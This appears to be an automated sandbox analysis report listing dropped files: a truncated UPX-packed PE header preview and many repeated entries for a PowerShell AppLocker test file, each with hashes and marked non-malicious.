                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w...3m..3m..3m..:...5m......1m......>m......;m......0m......0m..x...1m..3m..cm......2m......2m....j.2m......2m..Rich3m..................PE..d...]..e.........." ...#.`.......0.......@................................................`.............................................X....................@..........................................................@...........................................UPX0.....0..............................UPX1.....`...@...^..................@....rsrc................b..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                                                                            Entropy (8bit):3.115369244344814
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryPak7YnqqbPN5Dlq5J:+RI+ycuZhNtakSbPNnqX
                                                                                                                                                                                                                            MD5:C34471E04E28507CCCC36F547514A1E0
                                                                                                                                                                                                                            SHA1:4EA2B55EA28D23724884709A635E49E9B646688C
                                                                                                                                                                                                                            SHA-256:8F8D64B38EC517DD13203A9AEAC6D6B2864DADD9565C0CE5FE0D4E7DC53267AA
                                                                                                                                                                                                                            SHA-512:F2B8807F0DF62B3D6E3918C4BF75DF4B318E20A230874DC24C5569D9CB8F6E27CA11185CB02BCFC82604128EA0D1F876872332E83DF1726F2FD299D402BD24A8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
